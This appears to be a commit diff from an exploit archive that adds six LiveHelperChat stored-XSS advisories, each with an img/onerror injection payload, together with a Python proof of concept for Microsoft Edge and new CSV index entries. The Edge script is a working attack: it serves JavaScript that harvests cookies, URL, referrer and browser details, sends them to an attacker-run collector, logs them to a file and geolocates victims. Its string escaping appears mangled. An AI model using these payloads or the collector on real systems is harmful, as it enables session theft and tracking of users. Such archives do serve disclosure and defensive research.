# Exploit Title: LiveHelperChat 4.61 - Stored Cross Site Scripting (XSS)
via Telegram Bot Username
# Date: 09/06/2025
# Exploit Author: Manojkumar J (TheWhiteEvil)
# Linkedin: https://www.linkedin.com/in/manojkumar-j-7ba35b202/
# Vendor Homepage: https://github.com/LiveHelperChat/livehelperchat/
# Software Link:
https://github.com/LiveHelperChat/livehelperchat/
# Version: <=4.61
# Patched Version: 4.61
# Category: Web Application
# Tested on: Mac OS Sequoia 15.5, Firefox
# CVE : CVE-2025-51396
# Exploit link: https://github.com/Thewhiteevil/CVE-2025-51396
A stored cross-site scripting (XSS) vulnerability in Live Helper Chat
version ≤ 4.61 allows attackers to execute arbitrary JavaScript by
injecting a crafted payload into the Telegram Bot Username parameter. This
payload is stored and later executed when an admin or higher-privileged
user views or edits the Telegram Bot Username.
## Reproduction Steps:
1. Log in as an operator user in Live Helper Chat.
2. Navigate to `Settings > Live Help Configuration > Telegram Bot`.
3. In the **Bot Username** field, enter the following payload:
```
"><img src="x" onerror="prompt(1);">
```
4. Save the settings.
5. Revisit the Telegram configuration panel and — the payload will execute.

33
exploits/php/webapps/52377.txt Normal file
View file

@ -0,0 +1,33 @@
# Exploit Title: LiveHelperChat 4.61 - Stored Cross Site Scripting (XSS) via Operator Surname
# Date: 09/06/2025
# Exploit Author: Manojkumar J (TheWhiteEvil)
# Linkedin: https://www.linkedin.com/in/manojkumar-j-7ba35b202/
# Vendor Homepage: https://github.com/LiveHelperChat/livehelperchat/
# Software Link:
https://github.com/LiveHelperChat/livehelperchat/
# Version: <=4.61
# Patched Version: 4.61
# Category: Web Application
# Tested on: Mac OS Sequoia 15.5, Firefox
# CVE : CVE-2025-51397
# Exploit link: https://github.com/Thewhiteevil/CVE-2025-51397
A stored cross-site scripting (XSS) vulnerability in Live Helper Chat
version ≤ 4.61 allows attackers to execute arbitrary JavaScript by
injecting a crafted payload into the Operator Surname field. This payload
is stored and later executed when an admin or higher-privileged user views
the Recipients List where the attacker is listed as the Owner.
## Reproduction Steps:
1. Log in as an operator.
2. Navigate to your Operator Surname field.
3. Create new Operator Surname or Modify the Operator Surname, enter the
following payload:
```
"><img src="x" onerror="prompt(1);">
```
4. Save the changes.
5. This payload is stored and later executed when an admin or
higher-privileged user views the Recipients List where the attacker is
listed as the Owner.

35
exploits/php/webapps/52378.txt Normal file
View file

@ -0,0 +1,35 @@
# Exploit Title: LiveHelperChat 4.61 - Stored Cross Site Scripting (XSS)
via Facebook Integration Page Name Field
# Date: 09/06/2025
# Exploit Author: Manojkumar J (TheWhiteEvil)
# Linkedin: https://www.linkedin.com/in/manojkumar-j-7ba35b202/
# Vendor Homepage: https://github.com/LiveHelperChat/livehelperchat/
# Software Link:
https://github.com/LiveHelperChat/livehelperchat/
# Version: <=4.61
# Patched Version: 4.61
# Category: Web Application
# Tested on: Mac OS Sequoia 15.5, Firefox
# CVE : CVE-2025-51398
# Exploit link: https://github.com/Thewhiteevil/CVE-2025-51398
A stored cross-site scripting (XSS) vulnerability in Live Helper Chat
version ≤ 4.61 allows attackers to execute arbitrary JavaScript by
injecting a crafted payload into the Facebook page integration Name Field.
The payload is stored and executed when higher-privileged users (e.g.,
administrators) access or edit the integration settings, resulting in
stored Cross Site Scripting (XSS).
## Reproduction Steps:
1. Log in as an operator.
2. Navigate to your Facebook page integration.
3. Create new Facebook page integration, enter the following payload in the
Facebook page integration Name Field:
```
"><img src="x" onerror="prompt(1);">
```
4. Save the changes.
5. The payload is stored and executed when higher-privileged users (e.g.,
operator or administrators) access or edit the Facebook page integration,
resulting in stored Cross Site Scripting (XSS).

32
exploits/php/webapps/52379.txt Normal file
View file

@ -0,0 +1,32 @@
# Exploit Title: LiveHelperChat 4.61 - Stored Cross Site Scripting (XSS)
via Personal Canned Messages
# Date: 09/06/2025
# Exploit Author: Manojkumar J (TheWhiteEvil)
# Linkedin: https://www.linkedin.com/in/manojkumar-j-7ba35b202/
# Vendor Homepage: https://github.com/LiveHelperChat/livehelperchat/
# Software Link:
https://github.com/LiveHelperChat/livehelperchat/
# Version: <=4.61
# Patched Version: 4.61
# Category: Web Application
# Tested on: Mac OS Sequoia 15.5, Firefox
# CVE : CVE-2025-51400
# Exploit link: https://github.com/Thewhiteevil/CVE-2025-51400
A stored cross-site scripting (XSS) vulnerability in Live Helper Chat
version ≤ 4.61 allows attackers to execute arbitrary JavaScript by
injecting a crafted payload into the Personal Canned Messages. When an
admin or operator user views the message, and tries to send canned messages
the stored javascript executes in their browser context.
## Reproduction Steps:
1. Log in as an operator.
2. Navigate to your Personal Canned Messages.
3. Create new personal canned message, enter the following payload:
```
"><img src="x" onerror="prompt(1);">
```
4. Save the changes.
5. Try to use the personal canned message, the cross site scripting (xss)
will execute.

30
exploits/php/webapps/52380.txt Normal file
View file

@ -0,0 +1,30 @@
# Exploit Title: LiveHelperChat 4.61 - Stored Cross Site Scripting (XSS) via the Chat Transfer Function
# Date: 09/06/2025
# Exploit Author: Manojkumar J (TheWhiteEvil)
# Linkedin: https://www.linkedin.com/in/manojkumar-j-7ba35b202/
# Vendor Homepage: https://github.com/LiveHelperChat/livehelperchat/
# Software Link:
https://github.com/LiveHelperChat/livehelperchat/
# Version: <=4.61
# Patched Version: 4.61
# Category: Web Application
# Tested on: Mac OS Sequoia 15.5, Firefox
# CVE : CVE-2025-51401
# Exploit link: https://github.com/Thewhiteevil/CVE-2025-51401
A stored cross-site scripting (XSS) vulnerability in Live Helper Chat
version ≤ 4.61 allows attackers to execute arbitrary JavaScript by
injecting a crafted payload into the Operator Chat Name Field Triggers on
Chat Owner Transfer Functionality on Live Helper Chat.
## Reproduction Steps:
1. Log in as an operator.
2. Navigate to your operator settings page.
3. In the **Name** field, enter the following payload:
```
"><img src="x" onerror="prompt(1);">
```
4. Save the changes.
5. Initiate a chat with a visitor.
6. Transfer the chat to another operator — the XSS payload executes in the
receiving operators chat interface.

34
exploits/php/webapps/52381.txt Normal file
View file

@ -0,0 +1,34 @@
# Exploit Title: LiveHelperChat <=4.61 - Stored Cross Site Scripting (XSS)
via Department Assignment Alias Nick Field
# Date: 09/06/2025
# Exploit Author: Manojkumar J (TheWhiteEvil)
# Linkedin: https://www.linkedin.com/in/manojkumar-j-7ba35b202/
# Vendor Homepage: https://github.com/LiveHelperChat/livehelperchat/
# Software Link:
https://github.com/LiveHelperChat/livehelperchat/
# Version: <=4.61
# Patched Version: 4.61
# Category: Web Application
# Tested on: Mac OS Sequoia 15.5, Firefox
# CVE : CVE-2025-51403
# Exploit link: https://github.com/Thewhiteevil/CVE-2025-51403
# Reference:
https://github.com/LiveHelperChat/livehelperchat/pull/2228/commits/2056503ad96e04467ec9af8d827109b9b9b46223
A low-privileged user/operator injects a malicious JavaScript payload into
the Department Assignment "Alias Nick" field while assigning or editing
department access. When a higher-privileged user (e.g., admin or operator)
edits the department assignment "Alias Nick" field, the stored script is
executed in their browser context.
## Reproduction Steps:
1. Log in as an operator.
2. Navigate to your Department Assignment settings page.
3. In the "Alias Nick" field, enter the following payload:
```
"><img src="x" onerror="prompt(1);">
```
4. Save the changes.
5. Revist the Department Assignment settings page and edit the Alias Nick
field, the cross site scripting (xss) will execute.

235
exploits/windows/remote/52372.txt Normal file
View file

@ -0,0 +1,235 @@
# Titles: Microsoft Edge Windows 10 Version 1511 - Cross Site Scripting (XSS)
# Author: nu11secur1ty
# Date: 2025-07-18
# Vendor: Microsoft
# Software: Microsoft Edge Browser
# Reference: https://www.cve.org/CVERecord?id=CVE-2015-6176
#!/usr/bin/python
# nu11secur1ty CVE-2015-6176
import http.server
import socketserver
import socket
import threading
from urllib import parse
import requests
import datetime
PORT = 8080
COLLECTOR_PORT = 9000
# HTML page with extended XSS exploit that sends lots of info via Image GET
to collector
HTML_CONTENT = b\\\"\\\"\\\"<!DOCTYPE html>
<html lang=\\\"en\\\">
<head>
<meta charset=\\\"UTF-8\\\" />
<title>XSS Edge Bypass PoC</title>
<script>
window.onload = function() {
try {
var attackerServer = \\\"http://{LOCAL_IP}:{COLLECTOR_PORT}/collect\\\";
var cookies = document.cookie || \\\"\\\";
var url = window.location.href;
var referrer = document.referrer;
var language = navigator.language || \\\"\\\";
var platform = navigator.platform || \\\"\\\";
var timezone = Intl.DateTimeFormat().resolvedOptions().timeZone ||
\\\"\\\";
var screenRes = screen.width + \\\"x\\\" + screen.height;
var data = {
cookie: cookies,
url: url,
referrer: referrer,
language: language,
platform: platform,
timezone: timezone,
screen: screenRes
};
var query = Object.keys(data).map(function(k) {
return encodeURIComponent(k) + \\\"=\\\" +
encodeURIComponent(data[k]);
}).join(\\\"&\\\");
var img = new Image();
img.src = attackerServer + \\\"?\\\" + query;
} catch(e) {
console.error(\\\"Error sending data:\\\", e);
}
};
</script>
</head>
<body>
<h1 style=\\\"color:red;\\\">XSS Edge Bypass PoC</h1>
<p>If this alert appears, XSS is executed.</p>
</body>
</html>
\\\"\\\"\\\"
# Collector page with large sea picture and centered message (Unicode
allowed)
COLLECTOR_PAGE = \\\"\\\"\\\"<!DOCTYPE html>
<html lang=\\\"en\\\">
<head>
<meta charset=\\\"UTF-8\\\" />
<title>Collected</title>
<style>
body {
margin: 0;
background: url(\\\'
https://images.unsplash.com/photo-1506744038136-46273834b3fb?auto=format&fit=crop&w=1350&q=80\\\')
no-repeat center center fixed;
background-size: cover;
height: 100vh;
display: flex;
justify-content: center;
align-items: center;
color: white;
font-family: Arial, sans-serif;
font-size: 2em;
text-shadow: 2px 2px 5px rgba(0,0,0,0.7);
}
</style>
</head>
<body>
<div>Thank you for visiting the collector page </div>
</body>
</html>
\\\"\\\"\\\"
class ExploitHandler(http.server.SimpleHTTPRequestHandler):
def do_GET(self):
if self.path in (\\\'/\\\', \\\'/index.html\\\'):
content = HTML_CONTENT.replace(b\\\"{LOCAL_IP}\\\",
local_ip.encode()).replace(b\\\"{COLLECTOR_PORT}\\\",
str(COLLECTOR_PORT).encode())
self.send_response(200)
self.send_header(\\\"Content-Type\\\", \\\"text/html; charset=utf-8\\\")
self.send_header(\\\"Content-Length\\\", str(len(content)))
self.end_headers()
self.wfile.write(content)
else:
self.send_error(404)
class CollectorHandler(http.server.BaseHTTPRequestHandler):
def do_GET(self):
parsed_path = parse.urlparse(self.path)
if parsed_path.path == \\\"/collect\\\":
query = parse.parse_qs(parsed_path.query)
cookie = query.get(\\\"cookie\\\", [\\\"\\\"])[0]
url = query.get(\\\"url\\\", [\\\"\\\"])[0]
referrer = query.get(\\\"referrer\\\", [\\\"\\\"])[0]
language = query.get(\\\"language\\\", [\\\"\\\"])[0]
platform = query.get(\\\"platform\\\", [\\\"\\\"])[0]
timezone = query.get(\\\"timezone\\\", [\\\"\\\"])[0]
screen = query.get(\\\"screen\\\", [\\\"\\\"])[0]
ip = self.client_address[0]
user_agent = self.headers.get(\\\"User-Agent\\\", \\\"Unknown\\\")
timestamp = datetime.datetime.now().strftime(\\\"%Y-%m-%d
%H:%M:%S\\\")
location = self.get_location(ip)
if cookie:
print(f\\\"[{timestamp}] [+] Collected cookie: {cookie}\\\")
print(f\\\" URL: {url}\\\")
print(f\\\" Referrer: {referrer}\\\")
print(f\\\" Language: {language}\\\")
print(f\\\" Platform: {platform}\\\")
print(f\\\" Timezone: {timezone}\\\")
print(f\\\" Screen Resolution: {screen}\\\")
print(f\\\" From IP: {ip}\\\")
print(f\\\" User-Agent: {user_agent}\\\")
print(f\\\" Location: {location}\\\")
print(\\\"-\\\" * 50)
# Save collected info to a file
with open(\\\"collected_data.log\\\", \\\"a\\\", encoding=\\\"utf-8\\\") as f:
f.write(f\\\"[{timestamp}] Cookie: {cookie}\\\\n\\\")
f.write(f\\\" URL: {url}\\\\n\\\")
f.write(f\\\" Referrer: {referrer}\\\\n\\\")
f.write(f\\\" Language: {language}\\\\n\\\")
f.write(f\\\" Platform: {platform}\\\\n\\\")
f.write(f\\\" Timezone: {timezone}\\\\n\\\")
f.write(f\\\" Screen Resolution: {screen}\\\\n\\\")
f.write(f\\\" IP: {ip}\\\\n\\\")
f.write(f\\\" User-Agent: {user_agent}\\\\n\\\")
f.write(f\\\" Location: {location}\\\\n\\\")
f.write(\\\"-\\\" * 50 + \\\"\\\\n\\\")
self.send_response(200)
self.send_header(\\\"Content-Type\\\", \\\"text/html; charset=utf-8\\\")
content = COLLECTOR_PAGE.encode(\\\'utf-8\\\')
self.send_header(\\\"Content-Length\\\", str(len(content)))
self.end_headers()
self.wfile.write(content)
else:
self.send_error(404)
def get_location(self, ip):
# Use free IP info service; fallback gracefully if no internet
try:
resp = requests.get(f\\\"https://ipinfo.io/{ip}/json\\\", timeout=3)
if resp.status_code == 200:
data = resp.json()
city = data.get(\\\"city\\\", \\\"\\\")
region = data.get(\\\"region\\\", \\\"\\\")
country = data.get(\\\"country\\\", \\\"\\\")
loc = data.get(\\\"loc\\\", \\\"\\\")
return f\\\"{city}, {region}, {country} (coords: {loc})\\\"
except Exception:
pass
return \\\"Location lookup failed or unavailable\\\"
def get_local_ip():
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
s.connect((\\\"8.8.8.8\\\", 80))
ip = s.getsockname()[0]
except Exception:
ip = \\\"127.0.0.1\\\"
finally:
s.close()
return ip
def run_exploit_server():
with socketserver.TCPServer((\\\"\\\", PORT), ExploitHandler) as httpd:
print(f\\\"[*] Exploit server running at: http://
{local_ip}:{PORT}/index.html\\\")
httpd.serve_forever()
def run_collector_server():
with socketserver.TCPServer((\\\"\\\", COLLECTOR_PORT), CollectorHandler) as
httpd:
print(f\\\"[*] Collector server listening for stolen cookies at:
http://{local_ip}:{COLLECTOR_PORT}/collect\\\")
httpd.serve_forever()
if __name__ == \\\"__main__\\\":
local_ip = get_local_ip()
try:
print(f\\\"[*] Your server IP is: {local_ip}\\\")
exploit_thread = threading.Thread(target=run_exploit_server,
daemon=True)
exploit_thread.start()
run_collector_server()
except KeyboardInterrupt:
print(\\\"\\\\n[!] Shutting down servers. Goodbye!\\\")
```
# Video:
[href](https://www.youtube.com/watch?v=T2YLrFsvXOc)
# Source:
[href](
https://github.com/nu11secur1ty/CVE-mitre/tree/main/2025/CVE-2015-6176)
# Buy me a coffee if you are not ashamed:
[href](https://www.paypal.com/donate/?hosted_button_id=ZPQZT5XMC5RFY)

12
files_exploits.csv
View file

@ -11618,6 +11618,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
25205,exploits/multiple/remote/25205.txt,"Techland XPand Rally 1.0/1.1 - Remote Format String",2005-03-10,"Luigi Auriemma",remote,multiple,,2005-03-10,2013-05-13,1,,,,,,https://www.securityfocus.com/bid/12772/info 25205,exploits/multiple/remote/25205.txt,"Techland XPand Rally 1.0/1.1 - Remote Format String",2005-03-10,"Luigi Auriemma",remote,multiple,,2005-03-10,2013-05-13,1,,,,,,https://www.securityfocus.com/bid/12772/info
42753,exploits/multiple/remote/42753.txt,"Tecnovision DLX Spot - SSH Backdoor Access",2017-05-19,"Simon Brannstrom",remote,multiple,,2017-09-19,2017-09-20,0,CVE-2017-12930;CVE-2017-12929,,,,, 42753,exploits/multiple/remote/42753.txt,"Tecnovision DLX Spot - SSH Backdoor Access",2017-05-19,"Simon Brannstrom",remote,multiple,,2017-09-19,2017-09-20,0,CVE-2017-12930;CVE-2017-12929,,,,,
51019,exploits/multiple/remote/51019.txt,"Teleport v10.1.1 - Remote Code Execution (RCE)",2022-09-23,"Brandon Roach",remote,multiple,,2022-09-23,2022-09-23,0,CVE-2022-36633,,,,, 51019,exploits/multiple/remote/51019.txt,"Teleport v10.1.1 - Remote Code Execution (RCE)",2022-09-23,"Brandon Roach",remote,multiple,,2022-09-23,2022-09-23,0,CVE-2022-36633,,,,,
52374,exploits/multiple/remote/52374.c,"Tenda FH451 1.0.0.9 Router - Stack-based Buffer Overflow",2025-07-22,"Byte Reaper",remote,multiple,,2025-07-22,2025-07-22,0,CVE-2025-7795,,,,,
33499,exploits/multiple/remote/33499.txt,"thttpd 2.24 - HTTP Request Escape Sequence Terminal Command Injection",2010-01-11,evilaliv3,remote,multiple,,2010-01-11,2014-05-26,1,CVE-2009-4491;OSVDB-61775,,,,,https://www.securityfocus.com/bid/37714/info 33499,exploits/multiple/remote/33499.txt,"thttpd 2.24 - HTTP Request Escape Sequence Terminal Command Injection",2010-01-11,evilaliv3,remote,multiple,,2010-01-11,2014-05-26,1,CVE-2009-4491;OSVDB-61775,,,,,https://www.securityfocus.com/bid/37714/info
21276,exploits/multiple/remote/21276.txt,"Thunderstone TEXIS 3.0 - Full Path Disclosure",2002-02-06,phinegeek,remote,multiple,,2002-02-06,2012-09-12,1,CVE-2002-0266;OSVDB-4313,,,,,https://www.securityfocus.com/bid/4035/info 21276,exploits/multiple/remote/21276.txt,"Thunderstone TEXIS 3.0 - Full Path Disclosure",2002-02-06,phinegeek,remote,multiple,,2002-02-06,2012-09-12,1,CVE-2002-0266;OSVDB-4313,,,,,https://www.securityfocus.com/bid/4035/info
24224,exploits/multiple/remote/24224.c,"TildeSlash Monit 1-4 - Authentication Handling Buffer Overflow",2004-06-04,"Nilanjan De",remote,multiple,,2004-06-04,2013-01-19,1,,,,,,https://www.securityfocus.com/bid/10581/info 24224,exploits/multiple/remote/24224.c,"TildeSlash Monit 1-4 - Authentication Handling Buffer Overflow",2004-06-04,"Nilanjan De",remote,multiple,,2004-06-04,2013-01-19,1,,,,,,https://www.securityfocus.com/bid/10581/info
@ -11928,6 +11929,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
31686,exploits/multiple/webapps/31686.py,"Dexter (CasinoLoader) Panel - SQL Injection",2014-02-16,bwall,webapps,multiple,80,2014-02-16,2014-02-16,1,OSVDB-103387,,,,, 31686,exploits/multiple/webapps/31686.py,"Dexter (CasinoLoader) Panel - SQL Injection",2014-02-16,bwall,webapps,multiple,80,2014-02-16,2014-02-16,1,OSVDB-103387,,,,,
45007,exploits/multiple/webapps/45007.txt,"Dicoogle PACS 2.5.0 - Directory Traversal",2018-07-11,"Carlos Avila",webapps,multiple,,2018-07-11,2018-07-13,1,,Traversal,,http://www.exploit-db.com/screenshots/idlt45500/45007.png,, 45007,exploits/multiple/webapps/45007.txt,"Dicoogle PACS 2.5.0 - Directory Traversal",2018-07-11,"Carlos Avila",webapps,multiple,,2018-07-11,2018-07-13,1,,Traversal,,http://www.exploit-db.com/screenshots/idlt45500/45007.png,,
33759,exploits/multiple/webapps/33759.txt,"DirectAdmin 1.33.6 - 'CMD_DB_VIEW' Cross-Site Scripting",2010-03-14,r0t,webapps,multiple,,2010-03-14,2014-06-15,1,,,,,,https://www.securityfocus.com/bid/38721/info 33759,exploits/multiple/webapps/33759.txt,"DirectAdmin 1.33.6 - 'CMD_DB_VIEW' Cross-Site Scripting",2010-03-14,r0t,webapps,multiple,,2010-03-14,2014-06-15,1,,,,,,https://www.securityfocus.com/bid/38721/info
52375,exploits/multiple/webapps/52375.rb,"Discourse 3.1.1 - Unauthenticated Chat Message Access",2025-07-22,İbrahimsql,webapps,multiple,,2025-07-22,2025-07-22,0,CVE-2023-45131,,,,,
52358,exploits/multiple/webapps/52358.py,"Discourse 3.2.x - Anonymous Cache Poisoning",2025-07-08,İbrahimsql,webapps,multiple,,2025-07-08,2025-07-08,0,CVE-2024-47773,,,,, 52358,exploits/multiple/webapps/52358.py,"Discourse 3.2.x - Anonymous Cache Poisoning",2025-07-08,İbrahimsql,webapps,multiple,,2025-07-08,2025-07-08,0,CVE-2024-47773,,,,,
49752,exploits/multiple/webapps/49752.html,"DMA Radius Manager 4.4.0 - Cross-Site Request Forgery (CSRF)",2021-04-08,"Issac Briones",webapps,multiple,,2021-04-08,2021-04-08,0,CVE-2021-30147,,,,, 49752,exploits/multiple/webapps/49752.html,"DMA Radius Manager 4.4.0 - Cross-Site Request Forgery (CSRF)",2021-04-08,"Issac Briones",webapps,multiple,,2021-04-08,2021-04-08,0,CVE-2021-30147,,,,,
48681,exploits/multiple/webapps/48681.txt,"Docsify.js 4.11.4 - Reflective Cross-Site Scripting",2020-07-22,"Amin Sharifi",webapps,multiple,,2020-07-22,2020-07-22,0,CVE-2020-7680,,,,, 48681,exploits/multiple/webapps/48681.txt,"Docsify.js 4.11.4 - Reflective Cross-Site Scripting",2020-07-22,"Amin Sharifi",webapps,multiple,,2020-07-22,2020-07-22,0,CVE-2020-7680,,,,,
@ -12324,6 +12326,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
49736,exploits/multiple/webapps/49736.txt,"phpPgAdmin 7.13.0 - COPY FROM PROGRAM Command Execution (Authenticated)",2021-04-01,"Valerio Severini",webapps,multiple,,2021-04-01,2021-04-01,0,,,,,, 49736,exploits/multiple/webapps/49736.txt,"phpPgAdmin 7.13.0 - COPY FROM PROGRAM Command Execution (Authenticated)",2021-04-01,"Valerio Severini",webapps,multiple,,2021-04-01,2021-04-01,0,,,,,,
49192,exploits/multiple/webapps/49192.txt,"Phpscript-sgh 0.1.0 - Time Based Blind SQL Injection",2020-12-04,KeopssGroup0day_Inc,webapps,multiple,,2020-12-04,2020-12-04,0,,,,,, 49192,exploits/multiple/webapps/49192.txt,"Phpscript-sgh 0.1.0 - Time Based Blind SQL Injection",2020-12-04,KeopssGroup0day_Inc,webapps,multiple,,2020-12-04,2020-12-04,0,,,,,,
46935,exploits/multiple/webapps/46935.txt,"Phraseanet < 4.0.7 - Cross-Site Scripting",2019-05-28,"Krzysztof Szulski",webapps,multiple,,2019-05-28,2019-05-28,0,,,,,, 46935,exploits/multiple/webapps/46935.txt,"Phraseanet < 4.0.7 - Cross-Site Scripting",2019-05-28,"Krzysztof Szulski",webapps,multiple,,2019-05-28,2019-05-28,0,,,,,,
52370,exploits/multiple/webapps/52370.py,"Pie Register WordPress Plugin 3.7.1.4 - Authentication Bypass to RCE",2025-07-22,"Md Amanat Ullah (xSwads)",webapps,multiple,,2025-07-22,2025-07-22,0,CVE-2025-34077,,,,,
52194,exploits/multiple/webapps/52194.py,"Pimcore 11.4.2 - Stored cross site scripting",2025-04-14,maeitsec,webapps,multiple,,2025-04-14,2025-04-14,0,CVE-2024-11954,,,,, 52194,exploits/multiple/webapps/52194.py,"Pimcore 11.4.2 - Stored cross site scripting",2025-04-14,maeitsec,webapps,multiple,,2025-04-14,2025-04-14,0,CVE-2024-11954,,,,,
35623,exploits/multiple/webapps/35623.txt,"Pimcore CMS 2.3.0/3.0 - SQL Injection",2014-12-27,Vulnerability-Lab,webapps,multiple,,2014-12-27,2014-12-27,0,OSVDB-116460,,,,, 35623,exploits/multiple/webapps/35623.txt,"Pimcore CMS 2.3.0/3.0 - SQL Injection",2014-12-27,Vulnerability-Lab,webapps,multiple,,2014-12-27,2014-12-27,0,OSVDB-116460,,,,,
52193,exploits/multiple/webapps/52193.py,"Pimcore customer-data-framework 4.2.0 - SQL injection",2025-04-14,maeitsec,webapps,multiple,,2025-04-14,2025-04-14,0,CVE-2024-11956,,,,, 52193,exploits/multiple/webapps/52193.py,"Pimcore customer-data-framework 4.2.0 - SQL injection",2025-04-14,maeitsec,webapps,multiple,,2025-04-14,2025-04-14,0,CVE-2024-11956,,,,,
@ -12402,6 +12405,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
51150,exploits/multiple/webapps/51150.txt,"Shoplazza 1.1 - Stored Cross-Site Scripting (XSS)",2023-03-30,"Andrey Stoykov",webapps,multiple,,2023-03-30,2023-03-30,0,,,,,, 51150,exploits/multiple/webapps/51150.txt,"Shoplazza 1.1 - Stored Cross-Site Scripting (XSS)",2023-03-30,"Andrey Stoykov",webapps,multiple,,2023-03-30,2023-03-30,0,,,,,,
48712,exploits/multiple/webapps/48712.txt,"Sickbeard 0.1 - Cross-Site Request Forgery (Disable Authentication)",2020-07-26,bdrake,webapps,multiple,,2020-07-26,2020-07-26,0,,,,,, 48712,exploits/multiple/webapps/48712.txt,"Sickbeard 0.1 - Cross-Site Request Forgery (Disable Authentication)",2020-07-26,bdrake,webapps,multiple,,2020-07-26,2020-07-26,0,,,,,,
52199,exploits/multiple/webapps/52199.txt,"SilverStripe 5.3.8 - Stored Cross Site Scripting (XSS) (Authenticated)",2025-04-14,"James Nicoll",webapps,multiple,,2025-04-14,2025-04-14,0,CVE-2024-47605,,,,, 52199,exploits/multiple/webapps/52199.txt,"SilverStripe 5.3.8 - Stored Cross Site Scripting (XSS) (Authenticated)",2025-04-14,"James Nicoll",webapps,multiple,,2025-04-14,2025-04-14,0,CVE-2024-47605,,,,,
52371,exploits/multiple/webapps/52371.py,"Simple File List WordPress Plugin 4.2.2 - File Upload to RCE",2025-07-22,"Md Amanat Ullah (xSwads)",webapps,multiple,,2025-07-22,2025-07-22,0,CVE-2020-36847,,,,,
50073,exploits/multiple/webapps/50073.txt,"Simple Traffic Offense System 1.0 - Stored Cross Site Scripting (XSS)",2021-06-30,"Barış Yıldızoğlu",webapps,multiple,,2021-06-30,2021-06-30,0,,,,,, 50073,exploits/multiple/webapps/50073.txt,"Simple Traffic Offense System 1.0 - Stored Cross Site Scripting (XSS)",2021-06-30,"Barış Yıldızoğlu",webapps,multiple,,2021-06-30,2021-06-30,0,,,,,,
51796,exploits/multiple/webapps/51796.txt,"SISQUALWFM 7.1.319.103 - Host Header Injection",2024-02-15,"Omer Shaik",webapps,multiple,,2024-02-15,2024-02-15,0,,,,,, 51796,exploits/multiple/webapps/51796.txt,"SISQUALWFM 7.1.319.103 - Host Header Injection",2024-02-15,"Omer Shaik",webapps,multiple,,2024-02-15,2024-02-15,0,,,,,,
52344,exploits/multiple/webapps/52344.py,"Sitecore 10.4 - Remote Code Execution (RCE)",2025-06-26,"Yesith Alvarez",webapps,multiple,,2025-06-26,2025-06-26,0,CVE-2025-27218,,,,, 52344,exploits/multiple/webapps/52344.py,"Sitecore 10.4 - Remote Code Execution (RCE)",2025-06-26,"Yesith Alvarez",webapps,multiple,,2025-06-26,2025-06-26,0,CVE-2025-27218,,,,,
@ -20949,6 +20953,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
51640,exploits/php/webapps/51640.txt,"Joomla iProperty Real Estate 4.1.1 - Reflected XSS",2023-07-31,CraCkEr,webapps,php,,2023-07-31,2023-07-31,0,,,,,, 51640,exploits/php/webapps/51640.txt,"Joomla iProperty Real Estate 4.1.1 - Reflected XSS",2023-07-31,CraCkEr,webapps,php,,2023-07-31,2023-07-31,0,,,,,,
49627,exploits/php/webapps/49627.php,"Joomla JCK Editor 6.4.4 - 'parent' SQL Injection (2)",2021-03-08,"Nicholas Ferreira",webapps,php,,2021-03-08,2021-03-08,0,CVE-2018-17254,,,,, 49627,exploits/php/webapps/49627.php,"Joomla JCK Editor 6.4.4 - 'parent' SQL Injection (2)",2021-03-08,"Nicholas Ferreira",webapps,php,,2021-03-08,2021-03-08,0,CVE-2018-17254,,,,,
51645,exploits/php/webapps/51645.txt,"Joomla JLex Review 6.0.1 - Reflected XSS",2023-08-04,CraCkEr,webapps,php,,2023-08-04,2023-08-04,0,,,,,, 51645,exploits/php/webapps/51645.txt,"Joomla JLex Review 6.0.1 - Reflected XSS",2023-08-04,CraCkEr,webapps,php,,2023-08-04,2023-08-04,0,,,,,,
52373,exploits/php/webapps/52373.txt,"Joomla JS Jobs plugin 1.4.2 - SQL injection",2025-07-22,"Adam Wallwork",webapps,php,,2025-07-22,2025-07-22,0,CVE-2025-49484,,,,,
50927,exploits/php/webapps/50927.txt,"Joomla Plugin SexyPolling 2.1.7 - SQLi",2022-05-11,"Wolfgang Hotwagner",webapps,php,,2022-05-11,2022-05-11,0,,,,,, 50927,exploits/php/webapps/50927.txt,"Joomla Plugin SexyPolling 2.1.7 - SQLi",2022-05-11,"Wolfgang Hotwagner",webapps,php,,2022-05-11,2022-05-11,0,,,,,,
49064,exploits/php/webapps/49064.txt,"Joomla Plugin Simple Image Gallery Extended (SIGE) 3.5.3 - Multiple Vulnerabilities",2020-11-17,Vulnerability-Lab,webapps,php,,2020-11-17,2020-12-07,0,,,,,, 49064,exploits/php/webapps/49064.txt,"Joomla Plugin Simple Image Gallery Extended (SIGE) 3.5.3 - Multiple Vulnerabilities",2020-11-17,Vulnerability-Lab,webapps,php,,2020-11-17,2020-12-07,0,,,,,,
51638,exploits/php/webapps/51638.txt,"Joomla Solidres 2.13.3 - Reflected XSS",2023-07-31,CraCkEr,webapps,php,,2023-07-31,2023-07-31,0,,,,,, 51638,exploits/php/webapps/51638.txt,"Joomla Solidres 2.13.3 - Reflected XSS",2023-07-31,CraCkEr,webapps,php,,2023-07-31,2023-07-31,0,,,,,,
@ -23006,6 +23011,12 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
42487,exploits/php/webapps/42487.txt,"LiveCRM 1.0 - SQL Injection",2017-08-18,"Ihsan Sencan",webapps,php,,2017-08-18,2017-08-18,0,,,,,, 42487,exploits/php/webapps/42487.txt,"LiveCRM 1.0 - SQL Injection",2017-08-18,"Ihsan Sencan",webapps,php,,2017-08-18,2017-08-18,0,,,,,,
43860,exploits/php/webapps/43860.txt,"LiveCRM SaaS Cloud 1.0 - SQL Injection",2018-01-23,"Ihsan Sencan",webapps,php,,2018-01-23,2018-01-23,0,CVE-2018-5985,,,,, 43860,exploits/php/webapps/43860.txt,"LiveCRM SaaS Cloud 1.0 - SQL Injection",2018-01-23,"Ihsan Sencan",webapps,php,,2018-01-23,2018-01-23,0,CVE-2018-5985,,,,,
